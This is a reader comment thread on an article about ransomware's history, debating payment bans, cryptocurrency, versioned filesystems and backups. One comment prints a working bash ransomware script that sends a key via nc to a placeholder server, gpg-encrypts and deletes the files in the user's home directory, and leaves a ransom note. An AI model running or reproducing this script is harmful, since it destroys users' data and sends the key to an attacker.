back to article What do ransomware and Jesus have in common? A birth month and an unwillingness to die

Your Christmas holidays looked quite different in the '80s to how they do today. While some will remember what it was like to wake up on the 25th back then, some of you won't even have been born. The food hasn't changed much. Turkey, stuffing, Brussels sprouts… that's all been around for some time. Yet what some call the good …

  1. druck Silver badge

    You know the solution

    As the article mentions ransomware only really took off with the advent of payment by cryptocurrency, remove to that from the equation and 99.99% of the criminal enterprise will disappear over night. I'm sure someone will still attempt to get paid by a suitcase of cash under a bridge, or a Western union transfer, but the chances of many payments reaching remote criminals sitting pretty in sanctioned countries without extradition are infeasibly small.

    1. DS999 Silver badge

      Re: You know the solution

      And you don't even have to outlaw cryptocurrency. Just make it illegal to use for criminal enterprise or anything related to it, which would immediately make it illegal to use crypto to pay ransom (or to buy illegal drugs etc.)

      Before anyone laughs at the idea of making using something in a crime illegal, that's already been done many times where e.g. possession of a gun isn't illegal but is if you are carrying one when committing a felony it upgrades the charges. Or Al Capone getting put in Alcatraz not for all his criming, but for failing to pay taxes on the money he made from criming.

      It would be interesting to see how far the bitcoin price would fall if laws against paying ransom were made and enforced in the US & EU.

    2. Anonymous Coward
      Anonymous Coward

      Re: You know the solution

      As you may or may not be aware, fiat currency is not your money. It's the government's money and they can remove it at a whim. Just because they haven't done it yet, doesn't mean they won't. And it's not just the government, it's also their agents such as the credit card companies and the banks.

      I went to florida on holiday for 2 weeks and found out on day 2 that the bank had decided to block my cards until I presented myself at a bank in the UK. I had informed them I was going on holiday in plenty of time but blocked they remained.

      Oddly enough, the day I returned to the UK, my cards miraculously started working again without me going anywhere near a branch.

      Got a £900 payout from the bank for that after complaining to the relevant authorities.

      Not your keys, not your coins.

      With fiat currencies, you NEVER hold the keys.

      P.S. It's a little tiring when people keep suggesting that crypto is only used by criminals. 99.999% of crime involves conventional fiat currency.

  2. John Riddoch

    Part of the problem with Ransomware is how to stop it. At its heart, it's editing files a user can access and most users can access a lot of files as part of their work (or home systems). All you have to do is get the victim to run something which proves annoyingly easy, despite the cyber security training most of us are subjected to. You can't remove a user's access to files without stopping them doing their job, so what do you do? If that problem can be solved, ransomware becomes less of a threat.

    1. Paul Crawford Silver badge

      All you have to do is get the victim to run something which proves annoyingly easy

      An therein line the main (technical) problem. User access control in the classical system was about stopping a user screwing with other user's files, not their own on the assumption that nobody is that dumb but malice is a risk. Alas...

      You can remove local execute permissions on file systems to make it much harder, but these days with web browsers able to run arbitrary code from outside it is only part of the way there, not to mention the ever-dumb aspect of email attachments being able to run code (e.g. Adobe PDF doing far, far, more than just print-ready formatting)..

    2. Bitsminer Silver badge

      At its heart, it's editing files a user can access...

      Which may be the heart of the problem.

      Filesystems have not changed much in the last, oh, 50 years. Create a file, append to it, delete it. As long as you have the "authority", that is you are the owner, you have no "accountability", proof that your intentions (or the hacker imposter's intentions) were good.

      Change the filesystems to something more database like ("rollback transaction") or git-like ("reset HEAD^") then much hackery is foiled. Not all perhaps, but lots.

      Then "encrypt all files" becomes, whether hacker likes it or not, "encrypt all current files", and a rollback undoes this.

      Yes, yes, yes, I can hear the architects muttering about control planes and security rings and defending this imaginary new filesystem itself. In truth, firewalls and security features already stop 99.9% of attacks, it's the 0.1% that make the headlines. More security features like trustworthy and reversible filesystems might make that 0.0001%.

      1. Blazde Silver badge

        Re: At its heart, it's editing files a user can access...

        Downvoted because I disagree this is anything like a core solution but it's still an intriguing line of thinking.

        Filesystems that somehow, at the hardware level, never delete anything would be a privacy nightmare. They would also fill up with junk very rapidly - although storage is impressively cheap so that's becoming less of an obstacle. Finer-grained permissions around deleting data, append-only backups, snapshots and so on, all these technologies exist already but they're hassle to set up and maintain, and they're susceptible to vulnerabilities like any other software, and susceptible to misconfiguration and user mistake like any other permission system. So they can only ever be one of many lines of defence that realistically only the richest most security-conscious organisations use effectively. Most organisations are not rich of course. They cut corners where ever possible, the market incentivises that. It's the entire basis of our modern economy. It's very difficult to see how that changes dramatically, with either altered market incentives or state-enforced legislation.

        Historically societies stop crime effectively by disincentivising crime itself, not by expecting all non-criminals to do more than the minimum to constantly defend themselves against kidnappers and thieves and so on. It would be too expensive if I had to defend my home, car, person, and family from free-roaming armed gangs. Of course I make some efforts to secure my possessions, but even in countries where law enforcement has completely broken down there is a limit to what can be done.

        So I'm not sure the current situation will change very much until the pariah countries that tolerate and/or fund cyber-criminals are brought into the global fold, or cut-off from the internet and digital currencies, or something. Obviously that's not happening soon. Until then baby steps to increase security, going after the crims to whatever extent possible are still positive, but not anything approaching a solution.

        1. Richard 12 Silver badge
          Boffin

          Re: At its heart, it's editing files a user can access...

          There are already several filesystems that don't delete, instead they copy-on-write. To limit the size "old" versions are eventually deleted.

          These make spotting ransomware trivial - the size-on-disk suddenly dramatically increases as large widespread changes (the encryption) occurs, and thus it's incredibly simple to detect and "pull the plug" before anything is actually lost.

          On top of that, it's simpler to fix as you can just roll back to a previous state. Good data created during the attack itself may still be lost, but it's better than most backup strategies alone.

          Obviously this won't help at all if the attacker gets root as they can abuse the ability to prune and restore, so it's not a panacea.

      2. Paul Crawford Silver badge

        Re: At its heart, it's editing files a user can access...

        Having a backup is a major step forward, but the issue here is most people are also the administrator so if they can be tricked into running software it can remove an on-device backup (such as file system snapshots a la ZFS).

        You need immutable backups, and on different media so lost/damaged machine is not a loss of data. That means a different management interface/credentials and a 2nd device which costs in money, time, and business process. Few care until after they are screwed...

    3. DS999 Silver badge

      You can't stop it

      Trying to fix it through "more security" isn't going to work any better than fixing the problem of illegal drugs has with "more cops".

      You have to make it illegal to pay ransom, and illegal to offer ransomware insurance. Will that create some initial pain, yes. But that pain would have been a lot smaller if it had been done when I started advocating for this 6 or 7 years ago. And that pain will be a lot higher if we wait 6 or 7 more years before we finally give up the stupidity of trying to secure our way out of it and bite the bullet.

      1. Richard 12 Silver badge

        Re: You can't stop it

        Weeelll, ransomware insurance itself is fine.

        Insurance to cover the cost of re-securing and recovery afterwards is a reasonable concept - if only because coverage will certainly require a documented backup and disaster recovery plan. It shouldn't be commercially viable, but that's up to the businesses to price.

        It's the "paying a ransom" part that needs to be illegal - and involve personal consequences for authorisation. So if the insurer pays the ransom, the insurance manager or CEO authorising it goes to prison. Same as the other corruption laws around paying bribes.

  3. ComicalEngineer

    One of the problems is that software has become too complicated and thus there are too many vulnerabilities at so many levels within the code. IMHO one of the main objectives of software writers should be to build security into the code, of course that doesn't make any money and new features are what seems to sell software.

    The other issue, of course, is dumb users who will download infected files. One of my old companies had this happen where a member of the accounts department downloaded an "invoice" from an unknown source - the sender wasn't even on the supplier list and the attachment was an .exe file - and promptly infected all of the accounts department (about 30 PCs) with a trojan. fortunately we had our own IT team at the time and they caught it quickly having picked up a spike in network traffic. Nonetheless it stopped all accounts transactions for over a week.

  4. GNU Enjoyer
    Angel

    Ransomware is a problem inherit to proprietary OS's

    Those are the only OS's insecure enough for ransomware to be effective - if you run a free OS instead, don't run proprietary malware (including remote arbitrary code execution via JS in a web browser) and keep internet-accessing software updated, suddenly you are pretty much immune to anything but a directly targeted attack by a skilled cracker.

    Yes, if you keep running windows, it's only a question of time before you get hit by ransomware.

    The solution is to install GNU/Linux today.

    Ransomware is not particularly hard to write either, as below is one example of GNU/Linux ransomware I found, but due to its basic security design, all that can do is encrypt files in the users $HOME directory and even then this script is totally harmless in the filesystem of a competent GNU user, as the software does not get executed unless the user chooses to set the executable bit and then execute it (and of course any user who knows anything about GNU bash and gnupg will not execute the below script);

    #!/bin/bash

    # Copyright © 2024 翠星石

    # This program is free software: you can redistribute it and/or modify

    # it under the terms of the GNU Affero General Public License as published by

    # the Free Software Foundation, either version 3 of the License, or

    # (at your option) any later version.

    #

    # This program is distributed in the hope that it will be useful,

    # but WITHOUT ANY WARRANTY; without even the implied warranty of

    # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

    # GNU Affero General Public License for more details.

    #

    # You should have received a copy of the GNU Affero General Public License

    # along with this program. If not, see <https://www.gnu.org/licenses/>.

    RANDOM_PASSWORD="$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM"

    ID="$RANDOM$RANDOM"

    echo $ID:$RANDOM_PASSWORD | nc not-ransomware-server.biz 6969

    find "$HOME" -type f -exec gpg --symmetric --batch --passphrase $RANDOM_PASSWORD {} \;

    find "$HOME" -type f -not -name '*.gpg' -exec rm {} \;

    echo "All your files have been encrypted, make a breadstick payment to <x> and quote ID: $ID to receive a decryption password." > "$HOME"/README-encrypted.txt

    1. Bebu sa Ware
      Coat

      Re: Ransomware is a problem inherit to proprietary OS's

      I suspect the result of bash evaluating "$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM" won't be all that more random than $RANDOM.

  5. sitta_europea Silver badge

    Quoting the article:

    "... It's a shame Popp died when he did..."

    On the contrary, I'd have said that it's a shame he didn't die sixteen years earlier.

  6. Mentat74
    Joke

    What do ransomware and Jesus have in common?

    They are both being used to steal people's money...

    1. ecofeco Silver badge

      Re: What do ransomware and Jesus have in common?

      BA DUMP BA!!

    2. Winkypop Silver badge

      Re: What do ransomware and Jesus have in common?

      But wait!

      A late contender for post of the year.

      1. Richard 71

        Re: What do ransomware and Jesus have in common?

        You are wrong. Jesus WAS willing to die - that is the heart of the gospel!

        The good news is that He died on the cross (and us with Him) for all our sins.

        ...and He rose again (and us with Him) and is now seated at the right hand of God.

  7. Anonymous Coward
    Anonymous Coward

    Simple solution

    Disk is very cheap, it just needs firmware that only writes new files. Save an existing file and it just creates a new one or a diff, leaving the existing file in place. Encrypting a file creates a new file and doesn't alter the existing data. Nothing on the disk can be written to more than once. Basically a WORM drive. Sensitive data will need to be treated separately and the cost of securing that data is offset by the reduction in quantity as most data isn't that sensitive.

  8. amanfromMars 1 Silver badge

    Rogues or Heroes, Renegades or Saviours, Saints or Sinners ?

    Or just a Another Glitch in the Force to be Fixed?

    Cybercriminals now [ie 20 odd years ago] had the means to reach victims en masse thanks to the internet combined with cyber hygiene levels that were still fairly poor. ..... Connor Jones/El Reg

    After the passing of more than two decades of experience and opportunity, Connor, have lessons been learned and are effective practices deployed for all to enjoy greater virtual security and improved cyber hygiene levels, or are things still fairly poor ..... and even a great deal worse than earlier with many more instances of critical vulnerabilities in vital systems and utilities being ably exploited by increasing levels of sophisticated 0day and Disruptive Anonymous Trojan Attack which then itself opens up further opportunities enabling greater advancing developments in future alien leading fields of both practical human and remote virtual metadataphysical endeavour?

    1. amanfromMars 1 Silver badge

      Re: Rogues or Heroes, Renegades or Saviours, Saints or Sinners and Superunnatural Reckonings

      And for those able to reply truthfully and not be fooling themselves into the cold comfort of a psychotic state of delusional denial are the answers to those questions ...... No, No, Yes and Yes with the final Yes launching a multitude of further truthful inconvenient and uncomfortable answers questioning the future suitability of human leadership in constantly failing exclusive elite executive administrative systems should such leadership deny they are responsible and accountable for what is an expanding catastrophic problem of their own making in dire straits need of third party fixing seeds and feeds.

      have lessons been learned? ...... No

      are effective practices deployed?.... No

      are things still fairly poor?....Yes

      and even a great deal worse than earlier with many more instances of critical vulnerabilities in vital systems and utilities being ably exploited by increasing levels of sophisticated 0day and Disruptive Anonymous Trojan Attack which then itself opens up further opportunities enabling greater advancing developments in future alien leading fields of both practical human and remote virtual metadataphysical endeavour? .... Yes

  9. harrys Bronze badge

    if u get dun for ransomeware ur crap!

    nicely written article :)

    either....

    1) ur not that good at ur job

    2) u have not been given adequate resources/time to do ur job - begging the question.... why are u still there?

    3) ur boss when told of the remedy, understands, but doesnt give a shite because he's a tight arseole - again begging the question, what are u doing there?

    bottom line .... u dont try to prevent ransomeware, fools errand, u put in systems/procedures (and some training) into minimizing downtime and disruption when it happens ... AND ITS GOING TO COST A LOT... mainly in storage/software

    the more money u throw at it the lower the disruption period!

    its one of the few problems that can actually be fixed by throwing enough money at it.... a very rare thing indeed :)

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like